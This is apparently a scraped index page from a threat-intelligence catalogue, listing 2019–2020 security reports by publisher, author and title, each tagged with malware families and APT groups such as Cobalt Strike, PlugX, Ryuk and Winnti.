×Select Content2020-11-04

Sophos

Gabor SzappanosA new APT uses DLL side-loads to “KilllSomeOne” KilllSomeOne

PlugX

×Select Content2020-11-04

VMRay

Giovanni VignaTrick or Threat: Ryuk ransomware targets the health care industry BazarBackdoor

Cobalt Strike

Ryuk

TrickBot

×Select Content2020-11-03

InfoSec Handlers Diary Blog

Renato MarinhoAttackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike Cobalt Strike

×Select Content2020-11-03

Kaspersky Labs

GReATAPT trends report Q3 2020 WellMail

EVILNUM

Janicab

Poet RAT

AsyncRAT

Ave Maria

Cobalt Strike

Crimson RAT

CROSSWALK

Dtrack

LODEINFO

MoriAgent

Okrum

PlugX

poisonplug

Rover

ShadowPad

SoreFang

Winnti

×Select Content2020-10-30

Github (ThreatConnect-Inc)

ThreatConnectUNC 1878 Indicators from Threatconnect BazarBackdoor

Cobalt Strike

Ryuk

×Select Content2020-10-29

RiskIQ

RiskIQRyuk Ransomware: Extensive Attack Infrastructure Revealed Cobalt Strike

Ryuk

×Select Content2020-10-29

Red Canary

The Red Canary TeamA Bazar start: How one hospital thwarted a Ryuk ransomware outbreak Cobalt Strike

Ryuk

TrickBot

×Select Content2020-10-29

Github (Swisscom)

Swisscom CSIRTList of CobaltStrike C2's used by RYUK Cobalt Strike

×Select Content2020-10-28

FireEye

Douglas Bienstock,

Jeremy Kennelly,

Joshua Shilko,

Kimberly Goody,

Steve ElovitzUnhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser BazarBackdoor

Cobalt Strike

Ryuk

UNC1878

×Select Content2020-10-27

Sophos Managed Threat Response (MTR)

Greg IddonMTR Casebook: An active adversary caught in the act Cobalt Strike

×Select Content2020-10-27

Dr.Web

Dr.WebStudy of the ShadowPad APT backdoor and its relation to PlugX Ghost RAT

PlugX

ShadowPad

×Select Content2020-10-18

The DFIR Report

The DFIR ReportRyuk in 5 Hours BazarBackdoor

Cobalt Strike

Ryuk

×Select Content2020-10-14

RiskIQ

Jon Gross,

Steve GintyA Well-Marked Trail: Journeying through OceanLotus's Infrastructure Cobalt Strike

×Select Content2020-10-14

Sophos

Sean GallagherThey’re back: inside a new Ryuk ransomware attack Cobalt Strike

Ryuk

SystemBC

×Select Content2020-10-12

Malwarebytes Labs

Hossein Jazi,

Jérôme Segura,

Malwarebytes Threat Intelligence Team,

Roberto SantosWinnti APT group docks in Sri Lanka for new campaign DBoxAgent

SerialVlogger

Winnti

×Select Content2020-10-12

Advanced Intelligence

Roman Marshanski,

Vitali Kremez"Front Door" into BazarBackdoor: Stealthy Cybercrime Weapon BazarBackdoor

Cobalt Strike

Ryuk

×Select Content2020-10-11

Github (StrangerealIntel)

StrangerealIntelChimera, APT19 under the radar ? Cobalt Strike

Meterpreter

×Select Content2020-10-08

Bayerischer Rundfunk

Ann-Kathrin Wetter,

Hakan Tanriverdi,

Kai Biermann,

Max Zierer,

Thi Do NguyenThere is no safe place Cobalt Strike

×Select Content2020-10-08

The DFIR Report

The DFIR ReportRyuk’s Return BazarBackdoor

Cobalt Strike

Ryuk

×Select Content2020-10-02

Health Sector Cybersecurity Coordination Center (HC3)

Health Sector Cybersecurity Coordination Center (HC3)Report 202010021600: Recent Bazarloader Use in Ransomware Campaigns BazarBackdoor

Cobalt Strike

Ryuk

TrickBot

×Select Content2020-10-01

Wired

Andy GreenbergRussia’s Fancy Bear Hackers Likely Penetrated a US Federal Agency Cobalt Strike

Meterpreter

×Select Content2020-10-01

US-CERT

US-CERTAlert (AA20-275A): Potential for China Cyber Response to Heightened U.S.-China Tensions CHINACHOPPER

Cobalt Strike

Empire Downloader

MimiKatz

Poison Ivy

×Select Content2020-09-29

Github (Apr4h)

ApraCobaltStrikeScan Cobalt Strike

×Select Content2020-09-29

CrowdStrike

Kareem Hamdan,

Lucas MillerGetting the Bacon from the Beacon Cobalt Strike

×Select Content2020-09-24

US-CERT

US-CERTAnalysis Report (AR20-268A): Federal Agency Compromised by Malicious Cyber Actor Cobalt Strike

Meterpreter

×Select Content2020-09-21

Cisco Talos

Joe Marshall,

JON MUNSHAW,

Nick MavisThe art and science of detecting Cobalt Strike Cobalt Strike

×Select Content2020-09-18

Symantec

Threat Hunter TeamAPT41: Indictments Put Chinese Espionage Group in the Spotlight CROSSWALK

PlugX

poisonplug

ShadowPad

Winnti

×Select Content2020-09-18

Trend Micro

Trend MicroU.S. Justice Department Charges APT41 Hackers over Global Cyberattacks Cobalt Strike

ColdLock

×Select Content2020-09-16

FBI

FBIFBI Flash AC-000133-TT: Indictment of China-Based Cyber Actors Associated with APT 41for Intrusion Activities APT41

×Select Content2020-09-16

Department of Justice

Department of JusticeSeven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally APT41

RedGolf

×Select Content2020-09-15

US-CERT

US-CERTAlert (AA20-259A): Iran-Based Threat Actor Exploits VPN Vulnerabilities CHINACHOPPER

Fox Kitten

×Select Content2020-09-15

Recorded Future

Insikt Group®Back Despite Disruption: RedDelta Resumes Operations PlugX

×Select Content2020-09-15

US-CERT

US-CERTMalware Analysis Report (AR20-259A): Iranian Web Shells CHINACHOPPER

×Select Content2020-09-11

ThreatConnect

ThreatConnect Research TeamResearch Roundup: Activity on Previously Identified APT33 Domains Emotet

PlugX

APT33

×Select Content2020-09-10

Kaspersky Labs

GReATAn overview of targeted attacks and APTs on Linux Cloud Snooper

Dacls

DoubleFantasy

MESSAGETAP

Penquin Turla

Tsunami

elf.wellmess

X-Agent

×Select Content2020-09-08

PTSecurity

PTSecurityShadowPad: new activity from the Winnti group CCleaner Backdoor

Korlia

ShadowPad

TypeHash

×Select Content2020-09-03

Viettel Cybersecurity

vuonglvmAPT32 deobfuscation arsenal: Deobfuscating một vài loại Obfucation Toolkit của APT32 (Phần 2) Cobalt Strike

×Select Content2020-09-01

Cisco Talos

Caitlin Huey,

David LiebenbergQuarterly Report: Incident Response trends in Summer 2020 Cobalt Strike

LockBit

Mailto

Maze

Ryuk

×Select Content2020-08-31

The DFIR Report

The DFIR ReportNetWalker Ransomware in 1 Hour Cobalt Strike

Mailto

MimiKatz

×Select Content2020-08-20

Seebug Paper

MalaykeUse ZoomEye to track multiple Redteam C&C post-penetration attack frameworks Cobalt Strike

Empire Downloader

PoshC2

×Select Content2020-08-19

TEAMT5

TeamT5調查局 08/19 公布中國對台灣政府機關駭侵事件說明 Cobalt Strike

Waterbear

×Select Content2020-08-14

Twitter (@VK_intel)

Vitali KremezTweet on Zloader infection leading to Cobaltstrike Installation Cobalt Strike

Zloader

×Select Content2020-08-06

Wired

Andy GreenbergChinese Hackers Have Pillaged Taiwan's Semiconductor Industry Cobalt Strike

MimiKatz

Winnti

Red Charon

×Select Content2020-08-04

BlackHat

Chung-Kuan Chen,

Inndy Lin,

Shang-De JiangOperation Chimera - APT Operation Targets Semiconductor Vendors Cobalt Strike

MimiKatz

Winnti

Red Charon

×Select Content2020-07-29

Recorded Future

Insikt GroupChinese State-sponsored Group RedDelta Targets the Vatican and Catholic Organizations PlugX

×Select Content2020-07-29

ESET Research

welivesecurityTHREAT REPORT Q2 2020 DEFENSOR ID

HiddenAd

Bundlore

Pirrit

Agent.BTZ

Cerber

ClipBanker

CROSSWALK

Cryptowall

CTB Locker

DanaBot

Dharma

Formbook

Gandcrab

Grandoreiro

Houdini

ISFB

LockBit

Locky

Mailto

Maze

Microcin

Nemty

NjRAT

Phobos

PlugX

Pony

REvil

Socelars

STOP

Tinba

TrickBot

WannaCryptor

×Select Content2020-07-29

Kaspersky Labs

GReATAPT trends report Q2 2020 PhantomLance

Dacls

Penquin Turla

elf.wellmess

AppleJeus

Dacls

AcidBox

Cobalt Strike

Dacls

EternalPetya

Godlike12

Olympic Destroyer

PlugX

shadowhammer

ShadowPad

Sinowal

VHD Ransomware

Volgmer

WellMess

X-Agent

XTunnel

×Select Content2020-07-28

NTT

NTT SecurityCraftyPanda 標的型攻撃解析レポート Ghost RAT

PlugX

×Select Content2020-07-26

Shells.System blog

AskarIn-Memory shellcode decoding to evade AVs/EDRs Cobalt Strike

×Select Content2020-07-22

On the Hunt

Newton PaulAnalysing Fileless Malware: Cobalt Strike Beacon Cobalt Strike

×Select Content2020-07-21

YouTube ( OPCDE with Matt Suiche)

Mohamad MokbelvOPCDE #9 - A Journey into Malware HTTP Communication Channels Spectacles (Mohamad Mokbel) Alureon

Aytoke

Cobra Carbon System

CROSSWALK

danbot

ProtonBot

Silence

×Select Content2020-07-21

Department of Justice

Department of JusticeTwo Chinese Hackers Working with the Ministry of State Security Charged with Global Computer Intrusion Campaign Targeting Intellectual Property and Confidential Business Information, Including COVID-19 Research CHINACHOPPER

BRONZE SPRING

×Select Content2020-07-21

Malwarebytes

Hossein Jazi,

Jérôme SeguraChinese APT group targets India and Hong Kong using new variant of MgBot malware KSREMOTE

Cobalt Strike

MgBot

Evasive Panda

×Select Content2020-07-20

Dr.Web

Dr.WebStudy of the APT attacks on state institutions in Kazakhstan and Kyrgyzstan Microcin

Mirage

PlugX

WhiteBird

×Select Content2020-07-20

Risky.biz

Daniel GordonWhat even is Winnti? CCleaner Backdoor

Ghost RAT

PlugX

ZXShell

×Select Content2020-07-20

or10nlabs

oR10nReverse Engineering the New Mustang Panda PlugX Downloader PlugX

×Select Content2020-07-15

ZDNet

Catalin CimpanuChinese state hackers target Hong Kong Catholic Church PlugX

×Select Content2020-07-14

CrowdStrike

Falcon OverWatch TeamManufacturing Industry in the Adversaries’ Crosshairs ShadowPad

Snake

×Select Content2020-07-07

MWLab

Ladislav BačoCobalt Strike stagers used by FIN6 Cobalt Strike

×Select Content2020-07-05

Council on Foreign Relations

Cyber Operations TrackerAPT 41 APT41

×Select Content2020-07-05

or10nlabs

oR10nReverse Engineering the Mustang Panda PlugX RAT – Extracting the Config PlugX

×Select Content2020-07-05

Council on Foreign Relations

Cyber Operations TrackerWinnti Umbrella APT41

×Select Content2020-07-01

Contextis

Lampros Noutsos,

Oliver FayDLL Search Order Hijacking Cobalt Strike

PlugX

×Select Content2020-06-25

Dr.Web

Dr.WebBackDoor.ShadowPad.1 ShadowPad

×Select Content2020-06-23

NCC Group

Michael Sandee,

Nikolaos Pantazopoulos,

Stefano AntenucciWastedLocker: A New Ransomware Variant Developed By The Evil Corp Group Cobalt Strike

ISFB

WastedLocker

×Select Content2020-06-23

Symantec

Critical Attack Discovery and Intelligence TeamSodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike Cobalt Strike

REvil

×Select Content2020-06-22

Talos Intelligence

Asheer MalhotraIndigoDrop spreads via military-themed lures to deliver Cobalt Strike Cobalt Strike

IndigoDrop

×Select Content2020-06-22

Sentinel LABS

Jason Reaves,

Joshua PlattInside a TrickBot Cobalt Strike Attack Server Cobalt Strike

TrickBot

×Select Content2020-06-19

Zscaler

Atinderpal Singh,

Nirmal Singh,

Sahil AntilTargeted Attack Leverages India-China Border Dispute to Lure Victims Cobalt Strike

×Select Content2020-06-19

Youtube (Raphael Mudge)

Raphael MudgeBeacon Object Files - Luser Demo Cobalt Strike

×Select Content2020-06-18

Australian Cyber Security Centre

Australian Cyber Security Centre (ACSC)Advisory 2020-008: Copy-Paste Compromises –tactics, techniques and procedures used to target multiple Australian networks TwoFace

Cobalt Strike

Empire Downloader

×Select Content2020-06-17

Malwarebytes

Hossein Jazi,

Jérôme SeguraMulti-stage APT attack drops Cobalt Strike using Malleable C2 feature Cobalt Strike

×Select Content2020-06-16

Intezer

Aviygayil MechtingerELF Malware Analysis 101: Linux Threats No Longer an Afterthought Cloud Snooper

Dacls

EvilGnome

HiddenWasp

MESSAGETAP

NOTROBIN

QNAPCrypt

Winnti

×Select Content2020-06-15

NCC Group

Exploit Development GroupStriking Back at Retired Cobalt Strike: A look at a legacy vulnerability Cobalt Strike

×Select Content2020-06-09

Github (Sentinel-One)

Gal KristalCobaltStrikeParser Cobalt Strike

×Select Content2020-06-03

Kaspersky Labs

Giampaolo Dedola,

GReAT,

Mark LechtikCycldek: Bridging the (air) gap 8.t Dropper

NewCore RAT

PlugX

USBCulprit

GOBLIN PANDA

Hellsing

×Select Content2020-06-02

Lab52

Jagaimo KawaiiMustang Panda Recent Activity: Dll-Sideloading trojans with temporal C2 servers PlugX

×Select Content2020-05-24

or10nlabs

oR10nReverse Engineering the Mustang Panda PlugX Loader PlugX

×Select Content2020-05-21

ESET Research

Martin Smolár,

Mathieu TartareNo “Game over” for the Winnti Group ACEHASH

HTran

MimiKatz

PipeMon

×Select Content2020-05-15

Twitter (@stvemillertime)

Steve MillerTweet on SOGU development timeline, including TIGERPLUG IOCs PlugX

×Select Content2020-05-14

Lab52

DexThe energy reserves in the Eastern Mediterranean Sea and a malicious campaign of APT10 against Turkey Cobalt Strike

HTran

MimiKatz

PlugX

Quasar RAT

×Select Content2020-05-11

SentinelOne

Gal KristalThe Anatomy of an APT Attack and CobaltStrike Beacon’s Encoded Configuration Cobalt Strike

×Select Content2020-05-01

Viettel Cybersecurity

CyberthreatChiến dịch của nhóm APT Trung Quốc Goblin Panda tấn công vào Việt Nam lợi dụng đại dịch Covid-19 (phần 1) NewCore RAT

PlugX

×Select Content2020-04-24

The DFIR Report

The DFIR ReportUrsnif via LOLbins Cobalt Strike

LOLSnif

TeamSpy

×Select Content2020-04-16

Medium CyCraft

CyCraft Technology CorpTaiwan High-Tech Ecosystem Targeted by Foreign APT Group: Digital Skeleton Key Bypasses Security Measures Cobalt Strike

MimiKatz

Red Charon

×Select Content2020-04-13

Palo Alto Networks Unit 42

Bryan Lee,

Jen Miller-Osborn,

Robert FalconeAPT41 Using New Speculoos Backdoor to Target Organizations Globally Speculoos

APT41

×Select Content2020-04-07

Blackberry

Blackberry ResearchDecade of the RATS: Cross-Platform APT Espionage Attacks Targeting Linux, Windows and Android Penquin Turla

XOR DDoS

ZXShell

×Select Content2020-04-02

Darktrace

Max HeinemeyerCatching APT41 exploiting a zero-day vulnerability Cobalt Strike

×Select Content2020-03-26

VMWare Carbon Black

Scott KnightThe Dukes of Moscow Cobalt Strike

LiteDuke

MiniDuke

OnionDuke

PolyglotDuke

PowerDuke

×Select Content2020-03-25

FireEye

Christopher Glyer,

Dan Perez,

Sarah Jones,

Steve MillerThis Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits Speculoos

Cobalt Strike

×Select Content2020-03-25

Wilbur Security

JWTrickbot to Ryuk in Two Hours Cobalt Strike

Ryuk

TrickBot

×Select Content2020-03-22

Malware and Stuff

Andreas KlopschMustang Panda joins the COVID-19 bandwagon Cobalt Strike

×Select Content2020-03-22

Anomali

Anomali Threat ResearchCOVID-19 Themes Are Being Utilized by Threat Actors of Varying Sophistication PlugX

×Select Content2020-03-20

RECON INFOSEC

Luke RustenAnalysis Of Exploitation: CVE-2020-10189 ( exploited by APT41) Cobalt Strike

×Select Content2020-03-19

VinCSS

m4n0w4rAnalysis of malware taking advantage of the Covid-19 epidemic to spread fake "Directive of Prime Minister Nguyen Xuan Phuc" - Part 2 PlugX

×Select Content2020-03-10

VinCSS

m4n0w4r[RE012] Analysis of malware taking advantage of the Covid-19 epidemic to spread fake "Directive of Prime Minister Nguyen Xuan Phuc" - Part 1 PlugX

×Select Content2020-03-04

Cobalt Strike

Raphael MudgeCobalt Strike joins Core Impact at HelpSystems, LLC Cobalt Strike

×Select Content2020-03-04

CrowdStrike

CrowdStrike2020 CrowdStrike Global Threat Report MESSAGETAP

More_eggs

8.t Dropper

Anchor

BabyShark

BadNews

Clop

Cobalt Strike

CobInt

Cobra Carbon System

Cutwail

DanaBot

Dharma

DoppelDridex

DoppelPaymer

Dridex

Emotet

FlawedAmmyy

FriedEx

Gandcrab

Get2

IcedID

ISFB

KerrDown

LightNeuron

LockerGoga

Maze

MECHANICAL

Necurs

Nokki

Outlook Backdoor

Phobos

Predator The Thief

QakBot

REvil

RobinHood

Ryuk

SDBbot

Skipper

SmokeLoader

TerraRecon

TerraStealer

TerraTV

TinyLoader

TrickBot

Vidar

Winnti

ANTHROPOID SPIDER

APT23

APT31

APT39

APT40

BlackTech

BuhTrap

Charming Kitten

CLOCKWORK SPIDER

DOPPEL SPIDER

FIN7

Gamaredon Group

GOBLIN PANDA

MONTY SPIDER

MUSTANG PANDA

NARWHAL SPIDER

NOCTURNAL SPIDER

PINCHY SPIDER

SALTY SPIDER

SCULLY SPIDER

SMOKY SPIDER

Thrip

VENOM SPIDER

VICEROY TIGER

×Select Content2020-03-03

PWC UK

PWC UKCyber Threats 2019:A Year in Retrospect KevDroid

MESSAGETAP

magecart

AndroMut

Cobalt Strike

CobInt

Crimson RAT

DNSpionage

Dridex

Dtrack

Emotet

FlawedAmmyy

FlawedGrace

FriedEx

Gandcrab

Get2

GlobeImposter

Grateful POS

ISFB

Kazuar

LockerGoga

Nokki

QakBot

Ramnit

REvil

Rifdoor

RokRAT

Ryuk

shadowhammer

ShadowPad

Shifu

Skipper

StoneDrill

Stuxnet

TrickBot

Winnti

ZeroCleare

APT41

MUSTANG PANDA

Sea Turtle

×Select Content2020-03-02

Virus Bulletin

Alex HinchliffePulling the PKPLUG: the adversary playbook for the long-standing espionage activity of a Chinese nation-state adversary HenBox

Farseer

PlugX

Poison Ivy

×Select Content2020-02-21

ADEO DFIR

ADEO DFIRAPT10 Threat Analysis Report CHINACHOPPER

HTran

MimiKatz

PlugX

Quasar RAT

×Select Content2020-02-20

McAfee

Christiaan Beek,

Darren Fitzpatrick,

Eamonn RyanCSI: Evidence Indicators for Targeted Ransomware Attacks – Part II Cobalt Strike

LockerGoga

Maze

MegaCortex

×Select Content2020-02-19

FireEye

FireEyeM-Trends 2020 Cobalt Strike

Grateful POS

LockerGoga

QakBot

TrickBot

×Select Content2020-02-18

Cisco Talos

Vanja SvajcerBuilding a bypass with MSBuild Cobalt Strike

GRUNT

MimiKatz

×Select Content2020-02-18

Trend Micro

Cedric Pernet,

Daniel Lunghi,

Jamz Yaneza,

Kenney LuUncovering DRBControl: Inside the Cyberespionage Campaign Targeting Gambling Operations Cobalt Strike

HyperBro

PlugX

Trochilus RAT

×Select Content2020-02-17

Talent-Jump Technologies

Theo Chen,

Zero ChenCLAMBLING - A New Backdoor Base On Dropbox HyperBro

PlugX

×Select Content2020-02-13

Qianxin

Qi Anxin Threat Intelligence CenterAPT Report 2019 Chrysaor

Exodus

Dacls

VPNFilter

DNSRat

Griffon

KopiLuwak

More_eggs

SQLRat

AppleJeus

BONDUPDATER

Agent.BTZ

Anchor

AndroMut

AppleJeus

BOOSTWRITE

Brambul

Carbanak

Cobalt Strike

Dacls

DistTrack

DNSpionage

Dtrack

ELECTRICFISH

FlawedAmmyy

FlawedGrace

Get2

Grateful POS

HOPLIGHT

Imminent Monitor RAT

jason

Joanap

KerrDown

KEYMARBLE

Lambert

LightNeuron

LoJax

MiniDuke

PolyglotDuke

PowerRatankba

Rising Sun

SDBbot

ServHelper

Snatch

Stuxnet

TinyMet

tRat

TrickBot

Volgmer

X-Agent

Zebrocy

×Select Content2020-01-31

Avira

Shahab HamzeloofardNew wave of PlugX targets Hong Kong PlugX

×Select Content2020-01-31

YouTube (Context Information Security)

ContextisNew AVIVORE threat group – how they operate and managing the risk PlugX

×Select Content2020-01-31

ESET Research

Mathieu TartareWinnti Group targeting universities in Hong Kong ShadowPad

Winnti

×Select Content2020-01-29

nao_sec blog

nao_secAn Overhead View of the Royal Road BLACKCOFFEE

Cotx RAT

Datper

DDKONG

Derusbi

Icefog

Korlia

NewCore RAT

PLAINTEE

Poison Ivy

Sisfader

×Select Content2020-01-13

Lab52

Jagaimo KawaiiAPT27 ZxShell RootKit module updates ZXShell

×Select Content2020-01-01

Secureworks

SecureWorksGOLD KINGSWOOD More_eggs

ATMSpitter

Cobalt Strike

CobInt

MimiKatz

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE PRESIDENT CHINACHOPPER

Cobalt Strike

PlugX

MUSTANG PANDA

×Select Content2020-01-01

FireEye

Mandiant,

Mitchell Clarke,

Tom HallMandiant IR Grab Bag of Attacker Activity TwoFace

CHINACHOPPER

HyperBro

HyperSSL

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE ATLAS Speculoos

Winnti

ACEHASH

CCleaner Backdoor

CHINACHOPPER

Empire Downloader

HTran

MimiKatz

PlugX

Winnti

APT41

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE OLIVE ANGRYREBEL

PlugX

APT22

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE UNION 9002 RAT

CHINACHOPPER

Enfal

Ghost RAT

HttpBrowser

HyperBro

owaauth

PlugX

Poison Ivy

ZXShell

APT27

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE KEYSTONE 9002 RAT

BLACKCOFFEE

DeputyDog

Derusbi

HiKit

PlugX

Poison Ivy

ZXShell

APT17

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE RIVERSIDE Anel

ChChes

Cobalt Strike

PlugX

Poison Ivy

Quasar RAT

RedLeaves

APT10

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE OVERBROOK Aveo

DDKONG

IsSpace

PLAINTEE

PlugX

Rambo

DragonOK

×Select Content2020-01-01

Secureworks

SecureWorksGOLD DUPONT Cobalt Strike

Defray

PyXie

GOLD DUPONT

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE FIRESTONE 9002 RAT

Derusbi

Empire Downloader

PlugX

Poison Ivy

APT19

×Select Content2020-01-01

Secureworks

SecureWorksGOLD NIAGARA Bateleur

Griffon

Carbanak

Cobalt Strike

DRIFTPIN

TinyMet

FIN7

×Select Content2020-01-01

Secureworks

SecureWorksGOLD KINGSWOOD More_eggs

ATMSpitter

Cobalt Strike

CobInt

MimiKatz

Cobalt

×Select Content2020-01-01

Secureworks

SecureWorksTIN WOODLAWN Cobalt Strike

KerrDown

MimiKatz

PHOREAL

RatSnif

Remy

SOUNDBITE

APT32

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE EXPORT APT41

×Select Content2020-01-01

Dragos

Joe SlowikThreat Intelligence and the Limits of Malware Analysis Exaramel

Exaramel

Industroyer

Lookback

NjRAT

PlugX

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE MOHAWK AIRBREAK

scanbox

BLACKCOFFEE

CHINACHOPPER

Cobalt Strike

Derusbi

homefry

murkytop

SeDll

APT40

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE WOODLAND PlugX

Zeus

Roaming Tiger

×Select Content2020-01-01

Secureworks

SecureWorksBRONZE EXPRESS 9002 RAT

CHINACHOPPER

IsSpace

NewCT

PlugX

smac

APT26

×Select Content2019-12-29

Secureworks

CTU Research TeamBRONZE PRESIDENT Targets NGOs PlugX

×Select Content2019-12-17

Palo Alto Networks Unit 42

Jen Miller-Osborn,

Mike HarbisonRancor: Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia DDKONG

Derusbi

KHRAT

×Select Content2019-12-12

Microsoft

Microsoft Threat Intelligence CenterGALLIUM: Targeting global telecom CHINACHOPPER

Ghost RAT

HTran

MimiKatz

Poison Ivy

GALLIUM

×Select Content2019-12-12

FireEye

Chi-en Shen,

Oleg BondarenkoCyber Threat Landscape in Japan – Revealing Threat in the Shadow Cerberus

TSCookie

Cobalt Strike

Dtrack

Emotet

Formbook

IcedID

Icefog

IRONHALO

Loki Password Stealer (PWS)

PandaBanker

PLEAD

poisonplug

TrickBot

BlackTech

×Select Content2019-12-05

Github (blackorbird)

blackorbirdAPT32 Report Cobalt Strike

×Select Content2019-12-05

Raphael MudgeCobalt Strike 4.0 – Bring Your Own Weaponization Cobalt Strike

×Select Content2019-11-29

Deloitte

Thomas ThomasenCyber Threat Intelligence & Incident Response Cobalt Strike

×Select Content2019-11-19

FireEye

Kelli Vanderlee,

Nalani FraserAchievement Unlocked: Chinese Cyber Espionage Evolves to Support Higher Level Missions APT1

APT10

APT2

APT26

APT3

APT30

APT41

Naikon

Tonto Team

×Select Content2019-11-19

FireEye

Kelli Vanderlee,

Nalani FraserAchievement Unlocked: Chinese Cyber Espionage Evolves to Support Higher Level Missions MESSAGETAP

TSCookie

ACEHASH

CHINACHOPPER

Cobalt Strike

Derusbi

Empire Downloader

Ghost RAT

HIGHNOON

HTran

MimiKatz

NetWire RC

poisonplug

Poison Ivy

pupy

Quasar RAT

ZXShell

×Select Content2019-11-16

Silas Cutler's Blog

Silas CutlerFresh PlugX October 2019 PlugX

×Select Content2019-11-11

Virus Bulletin

Hiroshi Soeda,

Shusei Tomonaga,

Tomoaki Tani,

Wataru TakahashiAPT cases exploiting vulnerabilities in region‑specific software NodeRAT

Emdivi

PlugX

×Select Content2019-11-05

tccontre Blog

tccontreCobaltStrike - beacon.dll : Your No Ordinary MZ Header Cobalt Strike

×Select Content2019-10-31

FireEye

Dan Perez,

Raymond Leong,

Tyler DeanMESSAGETAP: Who’s Reading Your Text Messages? MESSAGETAP

×Select Content2019-10-31

PTSecurity

PTSecurityCalypso APT: new group attacking state institutions BYEBY

FlyingDutchman

Hussar

PlugX

×Select Content2019-10-22

Contextis

ContextisAVIVORE - An overview of Tools, Techniques and Procedures (Whitepaper) PlugX

Avivore

×Select Content2019-10-21

ESET Research

Mathieu TartareWinnti Group’s skip‑2.0: A Microsoft SQL Server backdoor LOWKEY

skip-2.0

×Select Content2019-10-15

FireEye

Tobias KruegerLOWKEY: Hunting for the Missing Volume Serial ID LOWKEY

poisonplug

×Select Content2019-10-07

ESET Research

Marc-Etienne M.Léveillé,

Mathieu TartareCONNECTING THE DOTS: Exposing the arsenal and methods of the Winnti Group LOWKEY

shadowhammer

ShadowPad

×Select Content2019-10-03

Palo Alto Networks Unit 42

Alex HinchliffePKPLUG: Chinese Cyber Espionage Group Attacking Asia HenBox

Farseer

PlugX

×Select Content2019-10-03

ComputerWeekly

Alex ScroxtonNew threat group behind Airbus cyber attacks, claim researchers PlugX

Avivore

×Select Content2019-09-30

vmware

Scott KnightCB Threat Analysis Unit: Technical Analysis of “Crosswalk” CROSSWALK

×Select Content2019-09-23

MITRE

MITRE ATT&CKAPT41 Derusbi

MESSAGETAP

Winnti

ASPXSpy

BLACKCOFFEE

CHINACHOPPER

Cobalt Strike

Derusbi

Empire Downloader

Ghost RAT

MimiKatz

NjRAT

PlugX

ShadowPad

Winnti

ZXShell

APT41

×Select Content2019-09-22

Check Point Research

Check Point ResearchRancor: The Year of The Phish 8.t Dropper

Cobalt Strike

×Select Content2019-09-19

MeltX0REmissary Panda APT: Recent infrastructure and RAT analysis ZXShell

×Select Content2019-09-04

FireEye

FireEyeAPT41: Double Dragon APT41, a dual espionage and cyber crime operation EASYNIGHT

Winnti

×Select Content2019-08-27

Cisco Talos

Paul Rascagnères,

Vanja SvajcerChina Chopper still active 9 years later CHINACHOPPER

×Select Content2019-08-19

FireEye

Alex Pennino,

Matt BromileyGAME OVER: Detecting and Stopping an APT41 Operation ACEHASH

CHINACHOPPER

HIGHNOON

×Select Content2019-08-09

FireEye

FireEyeDouble Dragon APT41, a dual espionage and cyber crime operation CLASSFON

crackshot

CROSSWALK

GEARSHIFT

HIGHNOON

HIGHNOON.BIN

JUMPALL

poisonplug

Winnti

×Select Content2019-08-08

Twitter (@MrDanPerez)

Dan PerezTweet on Winnti and HIGHNOON HIGHNOON

×Select Content2019-08-07

FireEye

Chi-en Shen,

Dan Perez,

Fred Plan,

Jacqueline O’Leary,

Nalani Fraser,

Raymond Leong,

Vincent CannonAPT41: A Dual Espionage and Cyber Crime Operation APT41

×Select Content2019-07-24

Intrusiontruth

IntrusiontruthAPT17 is run by the Jinan bureau of the Chinese Ministry of State Security BLACKCOFFEE

×Select Content2019-06-25

Cybereason

Cybereason NocturnusOPERATION SOFT CELL: A WORLDWIDE CAMPAIGN AGAINST TELECOMMUNICATIONS PROVIDERS CHINACHOPPER

HTran

MimiKatz

Poison Ivy

Operation Soft Cell

×Select Content2019-06-19

YouTube (44CON Information Security Conference)

Kevin O’ReillyThe Malware CAPE: Automated Extraction of Configuration and Payloads from Sophisticated Malware PlugX

×Select Content2019-06-13

Sekoia

sekoiaHunting and detecting Cobalt Strike Cobalt Strike

×Select Content2019-06-04

Bitdefender

BitdefenderAn APT Blueprint: Gaining New Visibility into Financial Threats More_eggs

Cobalt Strike

×Select Content2019-06-03

FireEye

Chi-en ShenInto the Fog - The Return of ICEFOG APT Icefog

PlugX

Sarhust

×Select Content2019-05-28

Palo Alto Networks Unit 42

Robert Falcone,

Tom LancasterEmissary Panda Attacks Middle East Government Sharepoint Servers CHINACHOPPER

HyperSSL

×Select Content2019-05-24

Fortinet

Ben HunterUncovering new Activity by APT10 PlugX

Quasar RAT

×Select Content2019-05-17

Bleeping Computer

Sergiu GatlanTeamViewer Confirms Undisclosed Breach From 2016 APT41

×Select Content2019-05-15

Chronicle

Juan Andrés Guerrero-Saade,

Silas CutlerWinnti: More than just Windows and Gates Winnti

APT41

×Select Content2019-05-08

Verizon Communications Inc.

Verizon Communications Inc.2019 Data Breach Investigations Report BlackEnergy

Cobalt Strike

DanaBot

Gandcrab

GreyEnergy

Mirai

Olympic Destroyer

SamSam

×Select Content2019-04-24

Weixin

Tencent"Sea Lotus" APT organization's attack techniques against China in the first quarter of 2019 revealed Cobalt Strike

SOUNDBITE

×Select Content2019-04-23

Kaspersky Labs

AMR,

GReATOperation ShadowHammer: a high-profile supply chain attack shadowhammer

ShadowPad

×Select Content2019-04-22

Trend Micro

Mohamad MokbelC/C++ Runtime Library Code Tampering in Supply Chain shadowhammer

ShadowPad

Winnti

×Select Content2019-04-15

PenTestPartners

Neil LinesCobalt Strike. Walkthrough for Red Teamers Cobalt Strike

×Select Content2019-04-04

Deutsche Welle

Deutsche WelleBayer points finger at Wicked Panda in cyberattack APT41
